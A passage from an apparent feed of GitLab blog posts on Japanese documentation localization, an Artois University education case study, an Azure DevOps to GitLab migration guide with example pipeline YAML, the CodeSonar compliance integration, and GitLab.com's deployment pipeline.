**anchor IDs** in the translated files by pre-processing the English file before it’s sent for translation. That improves the experience for people navigating to a docs page from a link. The consistent anchor ID means they can change to either language and still land in the correct place in the page. We also extended CI/CD pipelines to test localized content in Translation MRs following the same quality standards as the English docs. It allows us to catch invalid Hugo shortcodes, spaces inside links, or bare URLs. It also identifies orphaned files and redirects files with no target files. You can see the jobs that run on the MRs containing translated documentation on the GitLab project `.gitlab/ci/docs.gitlab-ci.yml` file. A centralized translation request system orchestrates the workflow, monitors the English files, identifies new and updated content, routes files for translation, automatically creates translation merge requests, tracks file status in translation requests and maintains an audit trail. To get docs translated we processed 430 Translation MRs with files ranging from 1-10 in each Translation MR. The result is a Japanese documentation experience that stays synchronized with English content updates, giving users faster access to critical information. Users can discover and navigate content fully in their language, with English appearing only for content that’s still in translation. They can trust GitLab’s quality standards while accessing the latest features quickly. All of this creates a sustainable, scalable foundation for future languages and documentation growth. Learn more about all the technical details in our GitLab Product Documentation Handbook page. ## Visit our Japanese docs site Whether you're a longtime GitLab user or just getting started, we hope this localized documentation makes your DevSecOps journey smoother and more accessible. This is just the beginning of our localization efforts, and your feedback is invaluable in helping us improve. If you notice any translation issues, have suggestions for improvement, or simply want to share your experience using the Japanese documentation, please don't hesitate to reach out. You can provide comments in our feedback issue. As we continue evolving this localization infrastructure, our immediate priorities include enhancing the search experience for Japanese users, and accelerating our continuous localization workflow to minimize the time gap between English updates and their Japanese translations. Thank you to our Japanese community for your continued support and patience as we work to serve you better. We're committed to making GitLab the best DevSecOps platform for Japanese teams, and comprehensive Japanese documentation is a crucial step in that journey. > Start exploring today at docs.gitlab.com/ja-jp!
about.gitlab.com
December 12, 2025 at 10:41 PM
Artois University elevates research and curriculum with GitLab Ultimate for Education
Leading academic institutions face a critical challenge: how to provide thousands of students and researchers with industry-standard, **full-featured DevSecOps tools** without compromising institutional control. Many start with basic version control, but the modern curriculum demands integrated capabilities for planning, security, and advanced CI/CD. The **GitLab for Education program** is designed to solve this by providing access to **GitLab Ultimate** for qualifying institutions, allowing them to scale their operations and elevate their academic offerings. This article showcases a powerful success story from the **Centre de Recherche en Informatique de Lens (CRIL)** , a joint laboratory of **Artois University** and CNRS in France. After years of relying solely on GitLab Community Edition (CE), the university's move to GitLab Ultimate through the GitLab for Education program immediately unlocked advanced capabilities, transforming their teaching, research, and contribution workflows virtually overnight. This story demonstrates why GitLab Ultimate is essential for institutions seeking to deliver advanced computer science and research curricula. ## GitLab Ultimate unlocked: Managing scale and driving academic value **Artois University's** self-managed GitLab instance is a large-scale operation, supporting nearly **3,000 users** across approximately **19,000 projects** , primarily serving computer science students and researchers. While GitLab Community Edition was robust, the upgrade to GitLab Ultimate provided the sophisticated tooling necessary for managing this scale and facilitating advanced university-level work. _**" We can see the difference," says Daniel Le Berre, head of research at CRIL and the instance maintainer. "It's a completely different product. Each week reveals new features that directly enhance our productivity and teaching."**_ The institution joined the GitLab for Education program specifically because it covers both **instructional and non-commercial research use cases** and offers full access to Ultimate's features, removing significant cost barriers. ### Key GitLab Ultimate benefits for students and researchers * **Advanced project management at scale:** Master's students now benefit from **GitLab Ultimate's project planning features**. This enables them to structure, track, and manage complex, long-term research projects using professional methodologies like portfolio management and advanced issue tracking that seamlessly roll up across their thousands of projects. * **Enhanced visibility:** Features like improved dashboards and code previews directly in Markdown files dramatically streamline tracking and documentation review, reducing administrative friction for both instructors and students managing large project loads. ## Comprehensive curriculum: From concepts to continuous delivery GitLab Ultimate is deeply integrated into the computer science curriculum, moving students beyond simple `git` commands to practical **DevSecOps implementation**. * **Git fundamentals:** Students begin by visualizing concepts using open-source tools to master Git concepts. * **Full CI/CD implementation:** Students use GitLab CI for rigorous **Test-Driven Development (TDD)** in their software projects. They learn to build, test, and perform quality assurance using unit and integration testing pipelines—core competency made seamless by the integrated platform. * **DevSecOps for research and documentation:** The university teaches students that DevSecOps principles are vital for all collaborative work. Inspired by earlier work in Delft, students manage and produce critical research documentation (PDFs from Markdown files) using GitLab, incorporating quality checks like linters and spell checks directly in the CI pipeline. This ensures high-quality, reproducible research output. * **Future-proofing security skills:** The GitLab Ultimate platform immediately positions the institution to incorporate advanced DevSecOps features like SAST and DAST scanning as their research and development code projects grow, ensuring students are prepared for industry security standards. ## Accelerating open source contributions with GitLab Duo Access to the full GitLab platform, including our AI capabilities, has empowered students to make impactful contributions to the wider open source community faster than ever before. Two Master's students recently completed direct contributions to the GitLab product, adding the **ORCID identifier** into user profiles. Working on GitLab.com, they leveraged **GitLab Duo's AI chat and code suggestions** to navigate the codebase efficiently. _**" This would not have been possible without GitLab Duo," Daniel Le Berre notes. "The AI features helped students, who might have lacked deep codebase knowledge, deliver meaningful contributions in just two weeks."**_ This demonstrates how providing students with cutting-edge tools **accelerates their learning and impact** , allowing them to translate classroom knowledge into real-world contributions immediately. ## Empowering open research and institutional control The stability of the self-managed instance at Artois University is key to its success. This model guarantees **institutional control and stability** — a critical factor for long-term research preservation. The institution's expertise in this area was recently highlighted in a major 2024 study led by CRIL, titled: "Higher Education and Research Forges in France - Definition, uses, limitations encountered and needs analysis" (Project on GitLab). The research found that the vast majority of public forges in French Higher Education and Research relied on **GitLab**. This finding underscores the consensus among academic leaders that self-hosted solutions are essential for **data control and longevity** , especially when compared to relying on external, commercial forges. ## Unlock GitLab Ultimate for your institution today The success story of **Artois University's CRIL** proves the transformative power of the GitLab for Education program. By providing **free access to GitLab Ultimate** , we enable large-scale institutions to: 1. **Deliver a modern, integrated DevSecOps curriculum.** 2. **Support advanced, collaborative research projects with Ultimate planning features.** 3. **Empower students to make AI-assisted open source contributions.** 4. **Maintain institutional control and data longevity.** If your academic institution is ready to equip its students and researchers with the complete DevSecOps platform and its most advanced features, we invite you to join the program. The program provides **free access to GitLab Ultimate** for qualifying instructional and non-commercial research use cases. **Apply now athttps://about.gitlab.com/solutions/education/join/.**
about.gitlab.com
December 10, 2025 at 10:43 PM
Guide: Migrate from Azure DevOps to GitLab
Migrating from Azure DevOps to GitLab can seem like a daunting task, but with the right approach and tools, it can be a smooth and efficient process. This guide will walk you through the steps needed to successfully migrate your projects, repositories, and pipelines from Azure DevOps to GitLab. ## Overview GitLab provides both Congregate (maintained by GitLab Professional Services organization) and a built-in Git repository import for migrating projects from Azure DevOps (ADO). These options support repository-by-repository or bulk migration and preserve git commit history, branches, and tags. With Congregate and professional services tools, we support additional assets such as wikis, work items, CI/CD variables, container images, packages, pipelines, and more (see this feature matrix). Use this guide to plan and execute your migration and complete post-migration follow-up tasks. Enterprises migrating from ADO to GitLab commonly follow a multi-phase approach: * Migrate repositories from ADO to GitLab using Congregate or GitLab's built-in repository migration. * Migrate pipelines from Azure Pipelines to GitLab CI/CD. * Migrate remaining assets such as boards, work items, and artifacts to GitLab Issues, Epics, and the Package and Container Registries. High-level migration phases: graph LR subgraph Prerequisites direction TB A["Set up identity provider (IdP) and<br/>provision users"] A --> B["Set up runners and<br/>third-party integrations"] B --> I["Users enablement and<br/>change management"] end subgraph MigrationPhase["Migration phase"] direction TB C["Migrate source code"] C --> D["Preserve contributions and<br/> format history"] D --> E["Migrate work items and<br/>map to <a href="https://docs.gitlab.com/topics/plan_and_track/">GitLab Plan <br/>and track work"] end subgraph PostMigration["Post-migration steps"] direction TB F["Create or translate <br/>ADO pipelines to GitLab CI"] F --> G["Migrate other assets<br/>packages and container images"] G --> H["Introduce <a href="https://docs.gitlab.com/user/application_security/secure_your_application/">security</a> and<br/>SDLC improvements"] end Prerequisites --> MigrationPhase MigrationPhase --> PostMigration style A fill:#FC6D26 style B fill:#FC6D26 style I fill:#FC6D26 style C fill:#8C929D style D fill:#8C929D style E fill:#8C929D style F fill:#FFA500 style G fill:#FFA500 style H fill:#FFA500 ## Planning your migration **To plan your migration, ask these questions:** * How soon do we need to complete the migration? * Do we understand what will be migrated? * Who will run the migration? * What organizational structure do we want in GitLab? * Are there any constraints, limitations, or pitfalls that need to be taken into account? Determine your timeline, as it will largely dictate your migration approach. Identify champions or groups familiar with both ADO and GitLab platforms (such as early adopters) to help drive adoption and provide guidance. **Inventory what you need to migrate:** * The number of repositories, pull requests, and contributors * The number and complexity of work items and pipelines * Repository sizes and dependency relationships * Critical integrations and runner requirements (agent pools with specific capabilities) Use GitLab Professional Services's Evaluate tool to produce a complete inventory of your entire Azure DevOps organization, including repositories, PR counts, contributor lists, number of pipelines, work items, CI/CD variables and more. If you're working with the GitLab Professional Services team, share this report with your engagement manager or technical architect to help plan the migration. Migration timing is primarily driven by pull request count, repository size, and amount of contributions (e.g. comments in PR, work items, etc). For example, 1,000 small repositories with few PRs and limited contributors can migrate much faster than a smaller set of repositories containing tens of thousands of PRs and thousands of contributors. Use your inventory data to estimate effort and plan test runs before proceeding with production migrations. Compare inventory against your desired timeline and decide whether to migrate all repositories at once or in batches. If teams cannot migrate simultaneously, batch and stagger migrations to align with team schedules. For example, in Professional Services engagements, we organize migrations into waves of 200-300 projects to manage complexity and respect API rate limits, both in GitLab and ADO. GitLab's built-in repository importer migrates Git repositories (commits, branches, and tags) one-by-one. Congregate is designed to preserve pull requests (known in GitLab as merge requests), comments, and related metadata where possible; the simple built-in repository import focuses only on the Git data (history, branches, and tags). **Items that typically require separate migration or manual recreation:** * Azure Pipelines - create equivalent GitLab CI/CD pipelines (consult with CI/CD YAML and/or with CI/CD components). Alternatively, consider using AI-based pipeline conversion available in Congregate. * Work items and boards - map to GitLab Issues, Epics, and Issue Boards. * Artifacts, container images (ACR) - migrate to GitLab Package Registry or Container Registry. * Service hooks and external integrations - recreate in GitLab. * Permissions models differ between ADO and GitLab; review and plan permissions mapping rather than assuming exact preservation. Review what each tool (Congregate vs. built-in import) will migrate and choose the one that fits your needs. Make a list of any data or integrations that must be migrated or recreated manually. **Who will run the migration?** Migrations are typically run by a GitLab group owner or instance administrator, or by a designated migrator who has been granted the necessary permissions on the destination group/project. Congregate and the GitLab import APIs require valid authentication tokens for both Azure DevOps and GitLab. * Decide whether a group owner/admin will perform the migrations or whether you will grant a specific team/person delegated access. * Ensure the migrator has correctly configured personal access tokens (Azure DevOps and GitLab) with the scopes required by your chosen migration tool (for example, api/read_repository scopes and any tool-specific requirements). * Test tokens and permissions with a small pilot migration. **Note:** Congregate leverages file-based import functionality for ADO migrations and requires instance administrator permissions to run (see our documentation). If you are migrating to GitLab.com, consider engaging Professional Services. For more information, see the Professional Services Full Catalog. Non-admin account cannot preserve contribution attribution! **What organizational structure do we want in GitLab?** While it's possible to map ADO structure directly to GitLab structure, it's recommended to rationalize and simplify the structure during migration. Consider how teams will work in GitLab and design the structure to facilitate collaboration and access management. Here is a way to think about mapping ADO structure to GitLab structure: graph TD subgraph GitLab direction TB A["Top-level Group"] B["Subgroup (optional)"] C["Projects"] A --> B A --> C B --> C end subgraph AzureDevOps["Azure DevOps"] direction TB F["Organizations"] G["Projects"] H["Repositories"] F --> G G --> H end style A fill:#FC6D26 style B fill:#FC6D26 style C fill:#FC6D26 style F fill:#8C929D style G fill:#8C929D style H fill:#8C929D Recommended approach: * Map each ADO organization to a GitLab group (or a small set of groups), not to many small groups. Avoid creating a GitLab group for every ADO team project. Use migration as an opportunity to rationalize your GitLab structure. * Use subgroups and project-level permissions to group related repositories. * Manage access to sets of projects by using GitLab groups and group membership (groups and subgroups) rather than one group per team project. * Review GitLab permissions and consider SAML Group Links to implement an enterprise RBAC model for your GitLab instance (or a GitLab.com namespace). **ADO Boards and work items: State of migration** It's important to understand how work items migrate from ADO into GitLab Plan (issues, epics, and boards). * ADO Boards and work items map to GitLab Issues, Epics, and Issue Boards. Plan how your workflows and board configurations will translate. * ADO Epics and Features become GitLab Epics. * Other work item types (e.g., user stories, tasks, bugs) become project-scoped issues. * Most standard fields are preserved; selected custom fields can be migrated when supported. * Parent-child relationships are retained so Epics reference all related issues. * Links to pull requests are converted to merge request links to maintain development traceability. Example: Migration of an individual work item to a GitLab Issue, including field accuracy and relationships: Batching guidance: * If you need to run migrations in batches, use your new group/subgroup structure to define batches (for example, by ADO organization or by product area). * Use inventory reports to drive batch selection and test each batch with a pilot migration before scaling. **Pipelines migration** Congregate recently introduced AI-powered conversion for multi-stage YAML pipelines from Azure DevOps to GitLab CI/CD. This automated conversion works best for simple, single-file pipelines and is designed to provide a working starting point rather than a production-ready `.gitlab-ci.yml` file. The tool generates a functionally equivalent GitLab pipeline that you can then refine and optimize for your specific needs. * Converts Azure Pipelines YAML to `.gitlab-ci.yml` format automatically. * Best suited for straightforward, single-file pipeline configurations. * Provides a boilerplate to accelerate migration, not a final production artifact. * Requires review and adjustment for complex scenarios, custom tasks, or enterprise requirements. * Does not support Azure DevOps classic release pipelines — convert these to multi-stage YAML first. Repository owners should review the GitLab CI/CD documentation to further optimize and enhance their pipelines after the initial conversion. Example of converted pipelines: # azure-pipelines.yml trigger: - main variables: imageName: myapp stages: - stage: Build jobs: - job: Build pool: vmImage: 'ubuntu-latest' steps: - checkout: self - task: Docker@2 displayName: Build Docker image inputs: command: build repository: $(imageName) Dockerfile: '**/Dockerfile' tags: | $(Build.BuildId) - stage: Test jobs: - job: Test pool: vmImage: 'ubuntu-latest' steps: - checkout: self # Example: run tests inside the container - script: | docker run --rm $(imageName):$(Build.BuildId) npm test displayName: Run tests - stage: Push jobs: - job: Push pool: vmImage: 'ubuntu-latest' steps: - checkout: self - task: Docker@2 displayName: Login to ACR inputs: command: login containerRegistry: '<your-acr-service-connection>' - task: Docker@2 displayName: Push image to ACR inputs: command: push repository: $(imageName) tags: | $(Build.BuildId) # .gitlab-ci.yml variables: imageName: myapp stages: - build - test - push build: stage: build image: docker:latest services: - docker:dind script: - docker build -t $imageName:$CI_PIPELINE_ID -f $(find . -name Dockerfile) . only: - main test: stage: test image: docker:latest services: - docker:dind script: - docker run --rm $imageName:$CI_PIPELINE_ID npm test only: - main push: stage: push image: docker:latest services: - docker:dind before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY script: - docker tag $imageName:$CI_PIPELINE_ID $CI_REGISTRY/$CI_PROJECT_PATH/$imageName:$CI_PIPELINE_ID - docker push $CI_REGISTRY/$CI_PROJECT_PATH/$imageName:$CI_PIPELINE_ID only: - main **Final checklist:** * Decide timeline and batch strategy. * Produce a full inventory of repositories, PRs, and contributors. * Choose Congregate or the built-in import based on scope (PRs and metadata vs. Git data only). * Decide who will run migrations and ensure tokens/permissions are configured. * Identify assets that must be migrated separately (pipelines, work items, artifacts, and hooks) and plan those efforts. * Run pilot migrations, validate results, then scale according to your plan. ## Running your migrations After planning, execute migrations in stages, starting with trial runs. Trial migrations help surface org-specific issues early and let you measure duration, validate outcomes, and fine-tune your approach before production. What trial migrations validate: * Whether a given repository and related assets migrate successfully (history, branches, tags; plus MRs/comments if using Congregate) * Whether the destination is usable immediately (permissions, runners, CI/CD variables, integrations) * How long each batch takes, to set schedules and stakeholder expectations Downtime guidance: * GitLab's built-in Git import and Congregate do not inherently require downtime. * For production waves, freeze changes in ADO (branch protections or read-only) to avoid missed commits, PR updates, or work items created mid-migration. * Trial runs do not require freezes and can be run anytime. Batching guidance: * Run trial batches back-to-back to shorten elapsed time; let teams validate results asynchronously. * Use your planned group/subgroup structure to define batches and respect API rate limits. Recommended steps: 1. Create a test destination in GitLab for trials: * GitLab.com: create a dedicated group/namespace (for example, my-org-sandbox) * Self-managed: create a top-level group or a separate test instance if needed 2. Prepare authentication: * Azure DevOps PAT with required scopes. * GitLab Personal Access Token with api and read_repository (plus admin access for file-based imports used by Congregate). 3. Run trial migrations: * Repos only: use GitLab's built-in import (Repo by URL) * Repos + PRs/MRs and additional assets: use Congregate 4. Post-trial follow-up: * Verify repo history, branches, tags; merge requests (if migrated), issues/epics (if migrated), labels, and relationships. * Check permissions/roles, protected branches, required approvals, runners/tags, variables/secrets, integrations/webhooks. * Validate pipelines (`.gitlab-ci.yml`) or converted pipelines where applicable. 5. Ask users to validate functionality and data fidelity. 6. Resolve issues uncovered during trials and update your runbooks. 7. Network and security: * If your destination uses IP allow lists, add the IPs of your migration host and any required runners/integrations so imports can succeed. 8. Run production migrations in waves: * Enforce change freezes in ADO during each wave. * Monitor progress and logs; retry or adjust batch sizes if you hit rate limits. 9. Optional: remove the sandbox group or archive it after you finish. <figure class="video_container"> <iframe src="https://www.youtube.com/embed/ibIXGfrVbi4?si=ZxOVnXjCF-h4Ne0N" frameborder="0" allowfullscreen="true"></iframe> </figure> ## Terminology reference for GitLab and Azure DevOps GitLab | Azure DevOps | Similarities & Key Differences ---|---|--- Group | Organization | Top-level namespace, membership, policies. ADO org contains Projects; GitLab Group contains Subgroups and Projects. Group or Subgroup | Project | Logical container, permissions boundary. ADO Project holds many repos; GitLab Groups/Subgroups organize many Projects. Project (includes a Git repo) | Repository (inside a Project) | Git history, branches, tags. In GitLab, a "Project" is the repo plus issues, CI/CD, wiki, etc. One repo per Project. Merge Request (MR) | Pull Request (PR) | Code review, discussions, approvals. MR rules include approvals, required pipelines, code owners. Protected Branches, MR Approval Rules, Status Checks | Branch Policies | Enforce reviews and checks. GitLab combines protections + approval rules + required status checks. GitLab CI/CD | Azure Pipelines | YAML pipelines, stages/jobs, logs. ADO also has classic UI pipelines; GitLab centers on .gitlab-ci.yml. .gitlab-ci.yml | azure-pipelines.yml | Defines stages/jobs/triggers. Syntax/features differ; map jobs, variables, artifacts, and triggers. Runners (shared/specific) | Agents / Agent Pools | Execute jobs on machines/containers. Target via demands (ADO) vs tags (GitLab). Registration/scoping differs. CI/CD Variables (project/group/instance), Protected/Masked | Pipeline Variables, Variable Groups, Library | Pass config/secrets to jobs. GitLab supports group inheritance and masking/protection flags. Integrations, CI/CD Variables, Deploy Keys | Service Connections | External auth to services/clouds. Map to integrations or variables; cloud-specific helpers available. Environments & Deployments (protected envs) | Environments (with approvals) | Track deploy targets/history. Approvals via protected envs and manual jobs in GitLab. Releases (tag + notes) | Releases (classic or pipelines) | Versioned notes/artifacts. GitLab Release ties to tags; deployments tracked separately. Job Artifacts | Pipeline Artifacts | Persist job outputs. Retention/expiry configured per job or project. Package Registry (NuGet/npm/Maven/PyPI/Composer, etc.) | Azure Artifacts (NuGet/npm/Maven, etc.) | Package hosting. Auth/namespace differ; migrate per package type. GitLab Container Registry | Azure Container Registry (ACR) or others | OCI images. GitLab provides per-project/group registries. Issue Boards | Boards | Visualize work by columns. GitLab boards are label-driven; multiple boards per project/group. Issues (types/labels), Epics | Work Items (User Story/Bug/Task) | Track units of work. Map ADO types/fields to labels/custom fields; epics at group level. Epics, Parent/Child Issues | Epics/Features | Hierarchy of work. Schema differs; use epics + issue relationships. Milestones and Iterations | Iteration Paths | Time-boxing. GitLab Iterations (group feature) or Milestones per project/group. Labels (scoped labels) | Area Paths | Categorization/ownership. Replace hierarchical areas with scoped labels. Project/Group Wiki | Project Wiki | Markdown wiki. Backed by repos in both; layout/auth differ slightly. Test reports via CI, Requirements/Test Management, integrations | Test Plans/Cases/Runs | QA evidence/traceability. No 1:1 with ADO Test Plans; often use CI reports + issues/requirements. Roles (Owner/Maintainer/Developer/Reporter/Guest) + custom roles | Access levels + granular permissions | Control read/write/admin. Models differ; leverage group inheritance and protected resources. Webhooks | Service Hooks | Event-driven integrations. Event names/payloads differ; reconfigure endpoints. Advanced Search | Code Search | Full-text repo search. Self-managed GitLab may need Elasticsearch/OpenSearch for advanced features.
about.gitlab.com
December 3, 2025 at 10:33 PM
Automate embedded systems compliance with GitLab and CodeSonar
Embedded systems development teams face a persistent challenge: maintaining development velocity while meeting stringent functional safety and code quality requirements. Standards like ISO 26262, IEC 62304, DO-178C, and IEC 61508 demand rigorous verification processes that are often manual and time-consuming. Compliance reviews against coding standards like MISRA C/C++, isolated scanning workflows, and post-development verification create bottlenecks. Teams are forced to choose between speed and safety. GitLab's integration with CodeSonar (from AdaCore) addresses this challenge by automating compliance workflows and enabling continuous verification throughout the development lifecycle. ## Specialized scanning for safety-critical systems Safety-critical systems require deep analysis of C/C++ code compiled with specialized embedded tools. These systems must demonstrate compliance with coding standards (MISRA C/C++, CERT C/C++, AUTOSAR C++) and functional safety frameworks (ISO 26262, DO-178C, IEC 61508) that require detailed evidence trails. Beyond aligning with coding standards, teams also need to address security concerns. This means testing for memory problems as well as a host of other problems like uninitialized variables and command injection. CodeSonar performs whole program analysis with specialized scanning capabilities for these standards. Pairing CodeSonar with GitLab enables teams to automate compliance workflows and maintain comprehensive audit trails throughout the development lifecycle. ## Automating compliance from commit to merge The GitLab and CodeSonar integration provides a compliance-as-code approach that automates policy enforcement from the earliest stages of development. CodeSonar functions as an additional scanner within GitLab CI/CD pipelines, analyzing code in every commit and merge request. Because CodeSonar was purpose-built for embedded systems, it performs deep control flow and data flow analysis across entire programs, identifying vulnerabilities like buffer overruns, data taint, uninitialized variables, use-after-free conditions, and command injection — the root causes of most security incidents in embedded systems. The integration works through GitLab's CI/CD configuration. When developers push code changes, the pipeline triggers CodeSonar scanning. For C and C++ firmware, CodeSonar observes compiler invocations during the actual build process, creating an internal representation of the code that enables sophisticated analysis. Results are converted from SARIF format to GitLab's Static Application Security Testing (SAST) format and surfaced directly in merge requests, where they feed into GitLab Ultimate's Security Dashboard, Vulnerability Management, and Compliance Frameworks. ## Example workflow: ISO 26262 ASIL-D compliance The demo video below shows the complete workflow for an embedded system subject to ISO 26262 ASIL-D requirements. The scenario illustrates how embedded development teams can implement continuous compliance without compromising development velocity. <div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1139086924?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Automated Compliance for Embedded Systems using GitLab and CodeSonar"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>` The workflow begins with a developer submitting a merge request for firmware changes. GitLab's CI/CD pipeline automatically triggers CodeSonar scanning, which performs deep C/C++ analysis against custom ISO 26262 policies configured in the pipeline. When CodeSonar identifies an ASIL-D relevant vulnerability, the pipeline halts automatically per the compliance policy, with clear documentation explaining the issue. The complete scan results, issue tracking, and approval workflow are maintained in GitLab as a single source of truth for audit trails. Developers can use both the CodeSonar hub interface and GitLab Duo AI to understand the vulnerability. CodeSonar provides detailed information about the path through the source code that leads to the problem, along with code navigation features to isolate the root cause. GitLab Duo explains the vulnerability and provides specific remediation recommendations. After the developer implements the fix and validates the resolution, the code merges successfully with full compliance evidence automatically collected throughout the process. ## Benefits of the integration Organizations implementing this integrated compliance with GitLab and CodeSonar will see significant improvements in both development velocity and compliance confidence. * **Efficiency gains:** Development teams reduce time-to-market by catching coding standard compliance issues early when they're less expensive to fix. Automated security policy enforcement decreases manual security review overhead, freeing specialists to focus on complex problems rather than routine checks. Audit readiness improves through automated evidence collection. Compliance artifacts are generated as a by-product of normal development rather than through separate documentation efforts. * **Compliance maturity:** This integrated approach helps organizations maintain continuous compliance with industry standards and regulations. By embedding verification into every code change, teams build comprehensive audit trails that demonstrate adherence to ISO 26262, DO-178C, MISRA C/C++, and other requirements. The automated workflow transforms compliance from a periodic checkpoint into an ongoing verification process. ## Implementation considerations Implementing the GitLab and CodeSonar integration requires access to GitLab Ultimate, a CodeSonar hub, GitLab runners where code can be compiled and analyzed, and appropriate mechanisms for managing analysis data files. Both GitLab and CodeSonar fully support **on-premises and air-gapped environments** and can be deployed to auto-scalable cloud environments as well. Teams should configure Custom Compliance Frameworks in GitLab to define specific policies for their relevant standards: ISO 26262 for automotive, DO-178C for aerospace, IEC 62304 for medical devices, and others. These frameworks enable automated enforcement of compliance requirements through merge request approval rules, vulnerability thresholds, and scan policy gates. # Get started The CodeSonar GitLab CI component is available through GitLab's CI/CD Catalog. Detailed integration documentation provides platform-specific setup instructions for Linux, Docker, and Windows environments. For organizations evaluating this solution, the implementation demonstrates how specialized embedded systems tools can integrate with a modern DevSecOps platform to deliver both development velocity and compliance rigor. For more information about implementing GitLab with CodeSonar for your embedded systems development, visit the CodeSonar integration documentation. You can also request a trial of CodeSonar.
about.gitlab.com
December 2, 2025 at 10:32 PM
How we deploy the largest GitLab instance 12 times daily
Every day, GitLab deploys code changes to the world's largest GitLab instance — GitLab.com — up to 12 times without any downtime. We use GitLab's own CI/CD platform to manage these deployments, which impact millions of developers worldwide. This deployment frequency serves as our primary quality gate and stress test. It also means our customers get access to new features within hours of development rather than waiting weeks or months. When organizations depend on GitLab for their DevOps workflows, they're using a platform that's proven at scale on our own infrastructure. In this article, you'll learn how we built an automated deployment pipeline using core GitLab CI/CD functionality to handle this deployment complexity. ## The business case for deployment velocity For GitLab: Our deployment frequency isn't just an engineering metric — it's a business imperative. Rapid deployment cycles mean we can respond to customer feedback within hours, ship security patches immediately, and validate new features in production before scaling them. For our customers: Every deployment to GitLab.com validates the deployment practices we recommend to our users. When you use GitLab's deployment features, you're using the same battle-tested approach that handles millions of git operations, CI/CD pipelines, and user interactions daily. You benefit from: * Latest features available immediately: New capabilities reach you within hours of completion, not in quarterly release cycles * Proven reliability at scale: If a feature works on GitLab.com, you can trust it in your environment * Full value of GitLab: Zero-downtime deployments mean you never lose access to your DevOps platform, even during updates * Real-world tested practices: Our deployment documentation isn't theory — it's exactly how we run the largest GitLab instance in existence ## Code flow architecture Our deployment pipeline follows a structured progression through multiple stages, each acting as a checkpoint on the journey from code proposal to production deployment. graph TD A[Code Proposed] --> B[Merge Request Created] B --> C[Pipeline Triggered] C --> D[Build & Test] D --> E{Spec/Integration/QA Tests Pass?} E -->|No| F[Feedback Loop] F --> B E -->|Yes| G[Merge to default branch] G -->|Periodically| H[Auto-Deploy Branch] subgraph "Deployment Pipeline" H --> I[Package Creation] I --> K[Canary Environment] K --> L[QA Validation] L --> M[Main Environment] end ## Deployment pipeline makeup Our deployment approach uses GitLab's native CI/CD capabilities to orchestrate complex deployments across hybrid infrastructure. Here's how we do it. ### Build Building GitLab is a complex topic in and of itself, so I'll go over the details at a high level. We build both our Omnibus package and our Cloud Native GitLab (CNG) images. The Omnibus packages deploy to our Gitaly fleet (our Git storage layer), while CNG images run all other components as containerized workloads. Other stateful services like Postgres and Redis have grown so large we have dedicated teams managing them separately. For GitLab.com, those systems are not deployed during our Auto-Deploy procedures. We have a scheduled pipeline that will regularly look at `gitlab-org/gitlab` and search for the most recent commit on the default branch with a successful (“green”) pipeline. Green pipelines signal that every component of GitLab has passed its comprehensive test suite. We then create an **auto-deploy branch** from that commit. This triggers a sequence of events: primarily, the need to build this package and all components that are a part of our monolith. Another scheduled pipeline selects the latest built package and initiates the deployment pipeline. Procedurally, it looks this simple: graph LR A[Create branch] --> B[Build] B --> C[Choose Built package] C --> D[Start Deploy Pipeline] Building takes some time, and since deployments can vary due to various circumstances, we choose the latest build to deploy. We technically build more versions of GitLab for .com than will ever be deployed. This enables us to always have a package lined up ready to go, and this brings us the closest we can be to having a full continuously delivered product for .com. ### Environment-based validation and Canary strategy Quality assurance (QA) isn't just an afterthought here — it's baked into every layer from development through deployment. Our QA process leverages automated test suites that include unit tests, integration tests, and end-to-end tests that simulate real user interactions with GitLab's features. But more importantly for our deployment pipeline, our QA process works hand-in-hand with our Canary strategy through environment-based validation. As part of our validation approach, we leverage GitLab's native Canary deployments, enabling controlled validation of changes with limited traffic exposure before full production deployment. We send roughly 5% of all traffic through our Canary stage. This approach increases the complexity of database migrations, but successfully navigating Canary deployments ensures we deploy a reliable product seamlessly. The Canary deployment features you use in GitLab were refined through managing one of the most complex deployment scenarios in production. When you implement Canary deployments for your applications, you're using patterns proven at massive scale. Our deployment process follows a progressive rollout strategy: 1. **Staging Canary:** Initial validation environment 2. **Production Canary:** Limited production traffic 3. **Staging Main:** Full staging environment deployment 4. **Production Main:** Full production rollout graph TD C[Staging Canary Deploy] C --> D[QA Smoke Main Stage Tests] C --> E[QA Smoke Canary Stage Tests] D --> F E --> F{Tests Pass?} F -->|Yes| G[Production Canary Deploy] G --> S[QA Smoke Main Stage Tests] G --> T[QA Smoke Canary Stage Tests] F -->|No| H[Issue Creation] H --> K[Fix & Backport] K --> C S --> M[Canary Traffic Monitoring] T --> M[Canary Traffic Monitoring baking period] M --> U[Production Safety Checks] U --> N[Staging Main] N --> V[Production Main] Our QA validation occurs at multiple checkpoints throughout this progressive deployment process: after each Canary deployment, and again after post-deploy migrations. This multilayered approach ensures that each phase of our deployment strategy has its own safety net. You can learn more about GitLab's comprehensive testing approach in our handbook. ## Deployment pipeline Here are the challenges we address across our deployment pipeline. ### Technical architecture considerations GitLab.com represents real-world deployment complexity at scale. As the largest known GitLab instance, deployments use our official GitLab Helm chart and the official Linux package — the same artifacts our customers use. You can learn more about the GitLab.com architecture in our handbook. This hybrid approach means our deployment pipeline must intelligently handle both containerized services and traditional Linux services in the same deployment cycle. **Dogfooding at scale:** We deploy using the same procedures we document for zero-downtime upgrades. If something doesn't work smoothly for us, we don't recommend it to customers. This self-imposed constraint drives continuous improvement in our deployment tooling. The following stages are run for all environment and stage upgrades: graph LR a[prep] --> c[Regular Migrations - Canary stage only] a --> f[Assets - Canary stage only] c --> d[Gitaly] d --> k8s subgraph subGraph0["VM workloads"] d["Gitaly"] end subgraph subGraph1["Kubernetes workloads"] k8s["k8s"] end subgraph fleet["fleet"] subGraph0 subGraph1 end **Stage details:** * **Prep:** Validates deployment readiness and performs pre-deployment checks * **Migrations:** Executes database regular migrations. This only happens during the Canary stage. Because both Canary and Main stages share the same database, these changes are already available when the Main stage deploys, eliminating the need to repeat these tasks. * **Assets:** We leverage a GCS bucket for all static assets. If any new assets are created, we upload these to our bucket such that they are immediately available to our Canary stage. As we leverage WebPack for assets, and properly leverage SHAs in the naming of our assets, we can confidently not worry that we override an older asset. Therefore, old assets continue to be available for older deployments 